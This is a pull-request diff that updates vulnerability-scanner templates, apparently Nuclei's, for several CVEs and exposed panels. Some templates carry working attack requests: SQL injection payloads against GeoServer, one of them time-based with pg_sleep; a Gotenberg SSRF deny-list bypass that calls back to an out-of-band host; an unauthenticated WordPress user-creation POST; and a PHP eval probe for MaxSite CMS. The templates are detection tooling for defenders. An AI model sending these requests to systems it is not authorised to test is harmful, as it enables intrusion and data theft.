### PR TITLE
upstream sync (semantic): changes requiring review

### DIFF
--- a/http/cves/2024/CVE-2024-13985.yaml
+++ b/http/cves/2024/CVE-2024-13985.yaml
@@ -26,7 +26,7 @@ info:
     shodan-query: '"Dahua EIMS"'
     verified: true
     zoomeye-query: app="大华 EIMS"
-  tags: cve,cve2024,dahua,eims,kev,oast,pre-auth,rce,vkev
+  tags: cve,cve2024,dahua,eims,oast,pre-auth,rce,vkev
 http:
   - matchers:
       - part: interactsh_protocol

--- a/http/cves/2024/CVE-2024-57726.yaml
+++ b/http/cves/2024/CVE-2024-57726.yaml
@@ -1,0 +1,52 @@
+id: CVE-2024-57726
+info:
+  name: SimpleHelp <= 5.5.7 - Privilege Escalation
+  author: popy21
+  severity: critical
+  description: |
+    SimpleHelp remote support software v5.5.7 and before contains a privilege escalation caused by insufficient access controls in API key creation, letting low-privileges technicians escalate privileges to server admin, exploit requires low-privileges technician access.
+  impact: |
+    Attackers can escalate privileges to server admin, potentially gaining full control over the system.
+  remediation: |
+    Update to the latest version of SimpleHelp that addresses this issue or apply the vendor's security patch.
+  reference:
+    - https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier
+    - https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-57726
+    - https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/
+    - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-dragonforce
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-57726
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+    cve-id: CVE-2024-57726
+    epss-score: 0.088
+    epss-percentile: 0.94726
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "SimpleHelp"})
+    max-request: 1
+    product: simplehelp
+    shodan-query: html:"SimpleHelp"
+    vendor: simple-help
+    verified: true
+  tags: auth-bypass,cve,cve2024,kev,passive,simple-help,simplehelp,vkev
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/allversions"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SH Version:"
+          - "Visual Version:"
+        condition: and
+      - type: regex
+        part: body
+        regex:
+          - 'Visual Version:\s*(?:[0-4]\.[0-9]+(?:\.[0-9]+)?|5\.[0-2](?:\.[0-9]+)?|5\.3\.[0-8]|5\.4\.[0-9]|5\.5\.[0-7])\b'
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a0047304502203ddfff905d9fc22d8956dcd06a1362fd84631149ed75c73804986ee28cb5ddfe022100f88d9e2c125f1ea147eaf35e323c2efef039a511e21788c99f13b87ac4393bf8:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2024/CVE-2024-57726.yaml
+++ b/http/cves/2024/CVE-2024-57726.yaml
@@ -20,10 +20,12 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.9
     cve-id: CVE-2024-57726
-    epss-score: 0.088
-    epss-percentile: 0.94726
+    cwe-id: CWE-862
+    epss-score: 0.66601
+    epss-percentile: 0.99224
+    cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# matches "SimpleHelp"})
+    runzero-match: service["product"] matches "^SimpleHelp:SimpleHelp"
     max-request: 1
     product: simplehelp
     shodan-query: html:"SimpleHelp"
@@ -36,17 +38,24 @@ http:
       - "{{BaseURL}}/allversions"
     matchers-condition: and
     matchers:
+      - type: status
+        status:
+          - 200
       - type: word
         part: body
         words:
           - "SH Version:"
           - "Visual Version:"
         condition: and
+      - type: dsl
+        dsl:
+          - 'compare_versions(version, "< 5.5.8")'
+
+    extractors:
       - type: regex
         part: body
+        name: version
+        internal: true
         regex:
           - 'Visual Version:\s*(?:[0-4]\.[0-9]+(?:\.[0-9]+)?|5\.[0-2](?:\.[0-9]+)?|5\.3\.[0-8]|5\.4\.[0-9]|5\.5\.[0-7])\b'
-      - type: status
-        status:
-          - 200
         # digest: 4a0a0047304502203ddfff905d9fc22d8956dcd06a1362fd84631149ed75c73804986ee28cb5ddfe022100f88d9e2c125f1ea147eaf35e323c2efef039a511e21788c99f13b87ac4393bf8:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2025/CVE-2025-26399.yaml
+++ b/http/cves/2025/CVE-2025-26399.yaml
@@ -24,7 +24,7 @@ info:
     epss-score: 0.88330
     epss-percentile: 0.99757
   metadata:
-    runzero-match: service["favicon.ico.image.mmh3"] == "1895809524"
+    runzero-match: service["product"] matches "^SolarWinds:Web Help Desk" || service["favicon.ico.image.mmh3"] == "1895809524"
     cisa-kev: true
     fofa-query: icon_hash="1895809524"
     max-request: 1

--- a/http/cves/2025/CVE-2025-26399.yaml
+++ b/http/cves/2025/CVE-2025-26399.yaml
@@ -1,0 +1,62 @@
+id: CVE-2025-26399
+info:
+  name: SolarWinds Web Help Desk < 12.8.7 - AjaxProxy Deserialization RCE
+  author: popy21
+  severity: critical
+  description: |
+    SolarWinds Web Help Desk contains an unauthenticated AjaxProxy deserialization remote code execution vulnerability, letting attackers run commands on the host machine without authentication, exploit requires no special privileges.
+  impact: |
+    Attackers can execute arbitrary commands on the host machine remotely without authentication, leading to full system compromise.
+  remediation: |
+    Update to the latest version that addresses this vulnerability.
+  reference:
+    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_12-8-7-hotfix-1_release_notes.htm
+    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-26399
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-26399
+    - https://labs.watchtowr.com/buy-a-help-desk-bundle-a-remote-access-solution-solarwinds-web-help-desk-pre-auth-rce-chain-s/
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-26399
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-26399
+    cwe-id: CWE-502
+    cpe: cpe:2.3:a:solarwinds:web_help_desk:*:*:*:*:*:*:*:*
+    epss-score: 0.88330
+    epss-percentile: 0.99757
+  metadata:
+    runzero-match: service["favicon.ico.image.mmh3"] == "1895809524"
+    cisa-kev: true
+    fofa-query: icon_hash="1895809524"
+    max-request: 1
+    product: web_help_desk
+    shodan-query: http.favicon.hash:"1895809524"
+    vendor: solarwinds
+    verified: true
+  tags: cve,cve2025,deserialization,kev,passive,rce,solarwinds,vkev,webhelpdesk
+http:
+  - raw:
+      - |
+        GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
+        Host: {{Hostname}}
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(body, "Web Help Desk Software", "SolarWinds WorldWide", "HCS Web Help Desk")'
+          - 'compare_versions(version, "< 12.8.7")'
+        condition: and
+    extractors:
+      - type: regex
+        name: build_token
+        part: body
+        group: 1
+        regex:
+          - "\\?v=([0-9]+_[0-9]+_[0-9]+_[0-9]+)"
+        internal: true
+      - type: dsl
+        name: version
+        dsl:
+          - 'replace(build_token, "_", ".")'
+        # digest: 490a0046304402207d00f47d3f4e12adc279d132d57106f2af3306b8cdf4db46ef826b878a28a96e02200c9c722de008a97ee192b9ff6e6f6c8fbcc0f1b38d1c9825a5658afab62b5502:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-21858.yaml
+++ b/http/cves/2026/CVE-2026-21858.yaml
@@ -24,7 +24,8 @@ info:
     max-request: 2
     shodan-query: http.favicon.hash:-831756631
     verified: true
-  tags: cve,cve2026,kev,n8n,passive,rce,vkev,workflow
+  tags: cve,cve2026,kev,n8n,rce,workflow
+flow: http(1) || http(2)
 http:
   - extractors:
       - group: 1
@@ -34,11 +35,6 @@ http:
           - <meta name="n8n:config:sentry" content="([A-Za-z0-9+/=]+)"
         type: regex
       - dsl:
-          - base64_decode(base64_content)
-        internal: true
-        name: decoded
-        type: dsl
-      - dsl:
           - replace_regex(base64_decode(base64_content), ".*n8n@([0-9]+\\.[0-9]+\\.[0-9]+).*", "$1")
         internal: true
         name: version
@@ -46,6 +42,7 @@ http:
       - dsl:
           - '"n8n Version: " + version'
         type: dsl
+    host-redirects: true
     matchers:
       - case-insensitive: true
         part: body
@@ -56,12 +53,40 @@ http:
           - 200
         type: status
       - dsl:
-          - compare_versions(version, '>= 1.65.0', '< 1.121.0')
+          - compare_versions(version, ">= 1.65.0", "< 1.121.0")
         # digest: 4a0a00473045022100de82aa8849faba2b281b3ed48b8653e03d319899988654b57fc560369ba2b20c022004794d47e26d5ccbf5b37829dd2d30391457cb4b21e2ab6f863f12fa1bee6756:922c64590222798bb761d5b6d8e72950
 
-        name: vulnerable
+        type: dsl
+    matchers-condition: and
+    max-redirects: 3
+    method: GET
+    path:
+      - '{{BaseURL}}/signin'
+  - extractors:
+      - group: 1
+        internal: true
+        name: version
+        regex:
+          - release":"([0-9.]+)"
+        type: regex
+      - dsl:
+          - '"n8n Version: " + version'
+        type: dsl
+    matchers:
+      - case-insensitive: true
+        part: body
+        type: word
+        words:
+          - '"release"'
+      - status:
+          - 200
+        type: status
+      - dsl:
+          - compare_versions(version, '>= 1.65.0', '< 1.121.0')
+        # digest: 490a00463044022068f095f63f4ec40018b1ce5f2c770be73cb1c1d814dc7c0b0031d27c180b2b40022046cdbc2be763f0f87b3a987b75c5781eec619857a918e7d74f2dc8afb9d8bb08:922c64590222798bb761d5b6d8e72950
+
         type: dsl
     matchers-condition: and
     method: GET
     path:
-      - '{{BaseURL}}/signin'
+      - '{{BaseURL}}/rest/sentry.js'

--- a/http/cves/2026/CVE-2026-27542.yaml
+++ b/http/cves/2026/CVE-2026-27542.yaml
@@ -1,0 +1,68 @@
+id: CVE-2026-27542
+info:
+  name: WooCommerce Wholesale Lead Capture <= 2.0.3.1 - Unauthenticated Privilege Escalation
+  author: theamanrawat,pdresearch
+  severity: critical
+  description: |
+    Rymera Web Co Pty Ltd. Woocommerce Wholesale Lead Capture <= 2.0.3.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
+  impact: |
+    Attackers can escalate their privileges, potentially gaining unauthorized access to restricted functions or data.
+  remediation: |
+    Update to the latest version beyond 2.0.3.1.
+  reference:
+    - https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540-
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-wholesale-lead-capture
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27542
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-27542
+    cwe-id: CWE-266
+    epss-score: 0.01737
+    epss-percentile: 0.75753
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "/wp-content/plugins/woocommerce-wholesale-lead-capture/"})
+    fofa-query: body="/wp-content/plugins/woocommerce-wholesale-lead-capture/"
+    framework: wordpress
+    max-request: 2
+    product: woocommerce-wholesale-lead-capture
+    publicwww-query: "/wp-content/plugins/woocommerce-wholesale-lead-capture/"
+    shodan-query: http.html:"/wp-content/plugins/woocommerce-wholesale-lead-capture/"
+    vendor: rymera-web-co
+    verified: true
+  tags: cve,cve2026,privesc,unauth,vkev,vuln,wholesale,woocommerce,wordpress,wp
+flow: http(1) && http(2)
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/woocommerce-wholesale-lead-capture/readme.txt"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "WooCommerce Wholesale Lead Capture")'
+          - 'compare_versions(version, "<= 2.0.3.1")'
+        condition: and
+        internal: true
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?m)Stable tag:\s+([0-9]+\.[0-9]+(?:\.[0-9]+(?:\.[0-9]+)*)?)'
+        internal: true
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded
+
+        action=wwlc_create_user
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - '!regex("^(-1|0)\\s*$", body) && len(body) > 2'
+          - 'contains_all(body, "wwlc_firstname", "wwlc_email")'
+        condition: and
+        # digest: 4a0a00473045022100e92d66e4bf90c0b5a580897ad10b098f573557051b86812c8005c09f4107c887022055a0e3ea71a90ef7b6fc368d2841487da8bbe841e1bf1fba471acbfdb4186d64:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-3395.yaml
+++ b/http/cves/2026/CVE-2026-3395.yaml
@@ -28,7 +28,7 @@ info:
     shodan-query: MaxSite CMS
     vendor: max-3000
     verified: true
-  tags: cms,cve,cve2026,eval,kev,maxsite,rce,vkev
+  tags: cms,cve,cve2026,eval,maxsite,rce,vkev
 flow: http(1) && http(2)
 http:
   - matchers:
@@ -53,11 +53,10 @@ http:
           - 200
         type: status
     matchers-condition: and
-    raw:
-      - |
-        POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        X-Requested-With: XMLHttpRequest
+    raw: |
+      POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+      X-Requested-With: XMLHttpRequest
 
-        data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D
+      data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D

--- a/http/cves/2026/CVE-2026-3395.yaml
+++ b/http/cves/2026/CVE-2026-3395.yaml
@@ -53,10 +53,11 @@ http:
           - 200
         type: status
     matchers-condition: and
-    raw: |
-      POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
-      Host: {{Hostname}}
-      Content-Type: application/x-www-form-urlencoded
-      X-Requested-With: XMLHttpRequest
+    raw:
+      - |
+        POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
 
-      data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D
+        data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D

--- a/http/cves/2026/CVE-2026-40280.yaml
+++ b/http/cves/2026/CVE-2026-40280.yaml
@@ -20,7 +20,7 @@ info:
     epss-score: 0.01491
     epss-percentile: 0.71912
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# matches "Gotenberg"})
+    runzero-match: any(each(service["http.bodies"]), {# matches "Hey, Gotenberg has no UI, it's an API\."})
     max-request: 1
     product: gotenberg
     shodan-query: http.html:"Gotenberg"

--- a/http/cves/2026/CVE-2026-40280.yaml
+++ b/http/cves/2026/CVE-2026-40280.yaml
@@ -1,0 +1,57 @@
+id: CVE-2026-40280
+info:
+  name: Gotenberg <= 8.30.1 - Server Side Request Forgery
+  author: str4k3r
+  severity: critical
+  description: |
+    Gotenberg is an API-based document conversion tool. In versions 8.30.1 and earlier, the default private-IP deny-lists for the --webhook-deny-list and --api-download-from-deny-list flags use a case-sensitive regular expression (^https?://) to match URL schemes. Because Go's net/url.Parse() normalizes the scheme to lowercase before establishing the outbound TCP connection, an attacker can bypass the deny-list by simply capitalizing part of the URL scheme (e.g., HTTP://, HTTPS://, or Http://). This allows unauthenticated requests to reach internal network services, including private IP ranges, loopback addresses, and cloud instance metadata endpoints such as HTTP://169.254.169.254/latest/meta-data.
+  impact: |
+    Unauthenticated SSRF via the downloadFrom feature allows reaching internal services, cloud metadata endpoints, and loopback addresses from the Gotenberg server.
+  remediation: This bypasses the same security control that was patched in CVE-2026-27018. This issue has been fixed in version 8.31.0.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-40280
+    - https://github.com/gotenberg/gotenberg/commit/3f01ca18d3cc21375a1e2da4b5a3f261c8548e47
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+    cvss-score: 9.3
+    cve-id: CVE-2026-40280
+    cwe-id: CWE-918
+    epss-score: 0.01491
+    epss-percentile: 0.71912
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "Gotenberg"})
+    max-request: 1
+    product: gotenberg
+    shodan-query: http.html:"Gotenberg"
+    vendor: thecodingmachine
+    verified: true
+  tags: cve,cve2026,downloadfrom,gotenberg,oast,ssrf
+http:
+  - raw:
+      - |
+        POST /forms/chromium/convert/html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----gotenbergProbe
+
+        ------gotenbergProbe
+        Content-Disposition: form-data; name="files"; filename="index.html"
+        Content-Type: text/html
+
+        <html><body>ssrf-probe</body></html>
+        ------gotenbergProbe
+        Content-Disposition: form-data; name="downloadFrom"
+
+        [{"url":"HTTP://{{interactsh-url}}"}]
+        ------gotenbergProbe--
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+      - type: word
+        part: interactsh_request
+        words:
+          - "Gotenberg"
+        # digest: 4b0a00483046022100af067adac7670c64383942f8e6d2a4adaeef4b908e089bd90632109daab23dc7022100ddc48edd271105fdcce356b7706bf4cac71c9aecd1428ec4a1f0aafaeda8d52a:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-40280.yaml
+++ b/http/cves/2026/CVE-2026-40280.yaml
@@ -20,7 +20,7 @@ info:
     epss-score: 0.01491
     epss-percentile: 0.71912
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# matches "Hey, Gotenberg has no UI, it's an API\."})
+    runzero-match: any(each(service["http.bodies"]), {# matches `Hey, Gotenberg has no UI, it's an API\.`})
     max-request: 1
     product: gotenberg
     shodan-query: http.html:"Gotenberg"

--- a/http/cves/2026/CVE-2026-45298.yaml
+++ b/http/cves/2026/CVE-2026-45298.yaml
@@ -18,11 +18,11 @@ info:
     cve-id: CVE-2026-45298
     cwe-id: CWE-918
     epss-score: 0.01491
-    epss-percentile: 0.71764
+    epss-percentile: 0.71906
   metadata:
     max-request: 1
     verified: true
-  tags: cve,cve2026,dozzle,ssrf
+  tags: cve,cve2026,dozzle,ssrf,vkev
 http:
   - matchers:
       - part: interactsh_protocol
@@ -35,7 +35,7 @@ http:
           - '"statusCode":200'
       - status:
           - 200
-        # digest: 490a004630440220206cfb43b650422407c308f74db4a90932a4332160e96bee55b50e3ee734df6402205de3aad788fd042ab00ec4edbfcd72d1ff157d89fd6e11bc63455040255c4eea:922c64590222798bb761d5b6d8e72950
+        # digest: 490a0046304402201c481ce57e29612b0617754cf984cee3c425272e13569d54463455e94425c6e502200a3a78993439819b2752af1e274e7b49575865faee4619653ab7bffb69ec65f7:922c64590222798bb761d5b6d8e72950
 
         type: status
     matchers-condition: and

--- a/http/exposed-panels/argocd-login.yaml
+++ b/http/exposed-panels/argocd-login.yaml
@@ -27,17 +27,29 @@ http:
     matchers:
       - condition: and
         dsl:
-          - contains(to_lower(header_1), 'grpc-metadata-content-type')
+          - contains(to_lower(body_1), '<title>argo cd</title>')
           - status_code_1 == 200
         type: dsl
       - condition: and
         dsl:
-          - contains(body_2, 'appLabelKey')
-          - contains(body_2, 'resourceOverrides')
+          - contains(to_lower(body_2), 'argocd control plane')
+          - status_code_2 == 200
+        type: dsl
+      - condition: and
+        dsl:
+          - contains(to_lower(body_3), 'argocd.argoproj.io')
+          - status_code_3 == 200
+        type: dsl
+      - condition: and
+        dsl:
+          - contains(to_lower(header_4), 'grpc-metadata-content-type')
+          - status_code_4 == 200
         type: dsl
     matchers-condition: or
     method: GET
     path:
-      - '{{BaseURL}}/api/version'
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/swagger.json'
       - '{{BaseURL}}/api/v1/settings'
+      - '{{BaseURL}}/api/version'
     stop-at-first-match: true

--- a/http/exposed-panels/shiori-panel.yaml
+++ b/http/exposed-panels/shiori-panel.yaml
@@ -1,0 +1,32 @@
+id: shiori-panel
+info:
+  name: Shiori Bookmark Manager - Detect
+  author: johnk3r
+  severity: info
+  description: |
+    Detected A Shiori bookmark manager panel.
+  reference:
+    - https://github.com/nicholasgasior/goshiori
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Shiori - Bookmarks Manager"})
+    fofa-query: title="Shiori - Bookmarks Manager"
+    max-request: 1
+    product: shiori
+    shodan-query: title:"Shiori - Bookmarks Manager"
+    vendor: shiori
+    verified: true
+  tags: detect,discovery,panel,shiori
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "shiori-token", "<title>Shiori - Bookmarks Manager</title>")'
+        condition: and
+        # digest: 4a0a00473045022027a31b332eef65badff010e6719f58a7266652c7dea46aef60901d3ad28676f3022100e10e8fbf094f76a71a6d3649834aa2e8c8e1049ae1f917d3bf90e09958824952:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/geoserver/geoserver-jsonarraycontains-sqli.yaml
+++ b/http/vulnerabilities/geoserver/geoserver-jsonarraycontains-sqli.yaml
@@ -1,0 +1,164 @@
+id: geoserver-jsonarraycontains-sqli
+info:
+  name: GeoServer jsonArrayContains CQL Filter - SQL Injection
+  author: portbuster1337,DhiyaneshDk
+  severity: critical
+  description: |
+    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoTools FilterToSqlHelper.constructEquality writes the expected argument of the jsonArrayContains CQL function RAW into the SQL string while only escaping the JSON pointer. A single quote in the value parameter breaks out of the PostgreSQL jsonb_path_exists string literal, enabling unauthenticated SQL injection. When the PostGIS backend runs with superuser privileges, the injection escalates to operating system command execution through PostgreSQL COPY TO PROGRAM. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should enable the PostGIS DataStore preparedStatements setting and disable encode functions as a workaround.
+  impact: |
+    Successful exploitation allows unauthenticated attackers to execute arbitrary SQL queries against the PostGIS database, potentially leading to full database exfiltration, data manipulation, or remote code execution on the database server via COPY TO PROGRAM.
+  remediation: |
+    Upgrade GeoServer to version 2.21.4 or 2.22.2 or later. As an interim workaround, enable the PostGIS DataStore preparedStatements setting to prevent stacked-query abuse and disable encode functions to limit CQL filter function misuse.
+  reference:
+    - https://gist.github.com/portbuster1337/70d75ec246b85e3199037ce212ff1a06
+    - https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25157
+    - https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-25157
+    cwe-id: CWE-89
+    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
+    epss-score: 0.85247
+    epss-percentile: 0.99697
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "geoserver"})
+    fofa-query:
+      - title="geoserver"
+      - app="geoserver"
+    google-query: intitle:"geoserver"
+    max-request: 6
+    product: geoserver
+    shodan-query:
+      - title:"geoserver"
+      - http.title:"geoserver"
+    vendor: osgeo
+    verified: "true"
+  tags: cve,cve2023,geoserver,jsonarraycontains,kev,osgeo,postgresql,sqli,vkev
+flow: |
+  set("ctx", "/geoserver");
+  http("detect");
+  if (!template["geoserver_detected"]) {
+    set("ctx", "");
+    http("detect");
+  }
+  if (template["geoserver_detected"]) {
+    http("capabilities");
+    for (var name of iterate(template["feature_names"])) {
+      set("name", name);
+      set("column", "");
+      http("get-column");
+      if (template["column"]) {
+        if (http("sqli-verify")) {
+          break;
+        }
+        if (http("sqli-time")) {
+          break;
+        }
+      }
+    }
+  }
+http:
+  - id: detect
+    raw:
+      - |
+        GET {{ctx}}/web/ HTTP/1.1
+        Host: {{Hostname}}
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        words:
+          - "GeoServer"
+        internal: true
+    extractors:
+      - type: regex
+        name: geoserver_detected
+        regex:
+          - '(GeoServer)'
+        group: 1
+        internal: true
+        part: body
+  - id: capabilities
+    raw:
+      - |
+        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: word
+        words:
+          - "FeatureType"
+        internal: true
+    extractors:
+      - type: regex
+        name: feature_names
+        regex:
+          - '(?s)<FeatureType[^>]*>\s*<Name>([^<]+)</Name>'
+        group: 1
+        internal: true
+        part: body
+  - id: get-column
+    raw:
+      - |
+        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=1&outputFormat=csv HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: word
+        words:
+          - "FID"
+        internal: true
+    extractors:
+      - type: regex
+        name: column
+        regex:
+          - 'FID,([a-zA-Z_][a-zA-Z0-9_]*)'
+        group: 1
+        internal: true
+        part: body
+  - id: sqli-verify
+    raw:
+      - |
+        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=jsonArrayContains(%22{{column}}%22,%27/a%27,%27x%27%27%27)%20=%20true HTTP/1.1
+        Host: {{Hostname}}
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "PSQLException"
+          - "SQL SELECT"
+          - "jsonb_path_exists"
+          - "syntax error"
+          - "unterminated quoted string"
+        condition: or
+      - type: word
+        part: header
+        words:
+          - "text/xml"
+    extractors:
+      - type: dsl
+        name: matched_feature
+        dsl:
+          - "name"
+      - type: kval
+        kval:
+          - content_type
+  - id: sqli-time
+    raw:
+      - |
+        @timeout: 30s
+        GET {{ctx}}/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=jsonArrayContains(%22{{column}}%22,%27/a%27,%27x%22)%27%27)%20AND%20(SELECT%20pg_sleep(6))%20IS%20NOT%20NULL%20)--%27)%20=%20true HTTP/1.1
+        Host: {{Hostname}}
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration>=6"
+    extractors:
+      - type: dsl
+        name: matched_feature
+        dsl:
+          - "name"
+        # digest: 4a0a00473045022060ba7c5b79dc1e283b9886939af02631b0cb98984327da2b0cd9807b93e3bfea022100cc97ac39bb6d45d3f0c32ea831654a4f2679553efc25697d0dbbb36c410fc948:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/gestsup-account-takeover.yaml
+++ b/http/vulnerabilities/gestsup-account-takeover.yaml
@@ -6,18 +6,20 @@ info:
   description: GestSup contains an authentication bypass vulnerability allowing attackers to take over user accounts, leading to full compromise including data disclosure and modification.
   impact: |
     An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
-  remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
+  remediation: |
+    Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
   reference:
     - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
     - https://doc.gestsup.fr/install/
   classification:
+    cve-id: CVE-2024-23163
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cwe-id: CWE-287
     cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: service["favicon.ico.image.mmh3"] == "-283003760"
+    runzero-reject: any(each(service["html.titles"]), {# matches "^GestSup"}) || service["favicon.ico.image.mmh3"] == "-283003760"
     fofa-query: title="GestSup"
     max-request: 1
     product: gestsup

--- a/http/vulnerabilities/gestsup-account-takeover.yaml
+++ b/http/vulnerabilities/gestsup-account-takeover.yaml
@@ -19,7 +19,7 @@ info:
     cwe-id: CWE-287
     cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*
   metadata:
-    runzero-reject: any(each(service["html.titles"]), {# matches "^GestSup"}) || service["favicon.ico.image.mmh3"] == "-283003760"
+    runzero-review: REJECT/2026-08-17/potentially leaves behind compromised artifacts
     fofa-query: title="GestSup"
     max-request: 1
     product: gestsup

--- a/http/vulnerabilities/gestsup-account-takeover.yaml
+++ b/http/vulnerabilities/gestsup-account-takeover.yaml
@@ -1,0 +1,58 @@
+id: gestsup-account-takeover
+info:
+  name: GestSup - Account Takeover
